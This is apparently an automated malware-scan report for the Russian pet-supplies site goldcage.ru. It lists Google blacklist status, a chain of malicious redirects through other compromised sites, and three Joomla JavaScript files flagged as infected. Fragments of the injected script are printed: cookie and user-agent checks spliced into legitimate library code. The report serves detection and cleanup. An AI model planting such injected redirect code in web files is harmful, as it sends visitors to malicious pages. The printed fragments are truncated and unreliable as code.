Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=goldcage.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://goldcage.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: goldcage.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Sep 2014 05:11:26 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.6.0 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 25 Sep 2014 05:11:27 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
Scanned pages/files
Request | Server response | Status |
http://goldcage.ru/ | 200 OK Content-Length: 15513 Content-Type: text/html | clean |
http://goldcage.ru/media/system/js/caption.js | 200 OK Content-Length: 2954 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); container.appendChild(text); } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://goldcage.ru/plugins/content/joomthumbnail/gallery/fancyzoom/FancyZoomHTML.js | 200 OK Content-Length: 14880 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); var inCapCol3 = document.createElement("td"); inCapRow1.appendChild(inCapCol3); var inCapImg2 = document.createElement("img"); inCapImg2.setAttribute('src', zoomImagesURI+'zoom-caption-r.png'); inCapImg2.setAttribute('width', '13'); inCapImg2.setAttribute('height', '26'); inCapImg2.style.display = 'block'; inCapCol3.appendChild(inCapImg2); } };;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://goldcage.ru/plugins/content/joomthumbnail/gallery/fancyzoom/FancyZoom.js | 200 OK Content-Length: 26632 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); shift = window.event.shiftKey; } else if (evt) { shift = evt.shiftKey; if (shift) evt.stopPropagation(); } return shift; } function findElementPos(elemFind) { var elemX = 0; var elemY = 0; do { elemX += elemFind.offsetLeft; elemY += elemFind.offsetTop; } while ( elemFind = elemFind.offsetParent ) return Array(elemX, elemY); };;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://mc.yandex.ru/metrika/watch.js | 200 OK Content-Length: 58829 Content-Type: application/x-javascript | clean |
http://goldcage.ru/index.php | 200 OK Content-Length: 15522 Content-Type: text/html | clean |
http://goldcage.ru/birds.html | 200 OK Content-Length: 77284 Content-Type: text/html | clean |
http://goldcage.ru/rodents.html | 200 OK Content-Length: 80207 Content-Type: text/html | clean |
http://goldcage.ru/dogs.html | 200 OK Content-Length: 30730 Content-Type: text/html | clean |
http://goldcage.ru/cats.html | 200 OK Content-Length: 30562 Content-Type: text/html | clean |
http://goldcage.ru/kontackts.html | 200 OK Content-Length: 8685 Content-Type: text/html | clean |
http://goldcage.ru/modules/mod_yoo_accordion/mod_yoo_accordion.js | 200 OK Content-Length: 2414 Content-Type: application/x-javascript | clean |
http://goldcage.ru/news.html | 200 OK Content-Length: 15583 Content-Type: text/html | clean |
http://goldcage.ru/stock.html | 200 OK Content-Length: 10946 Content-Type: text/html | clean |
http://goldcage.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |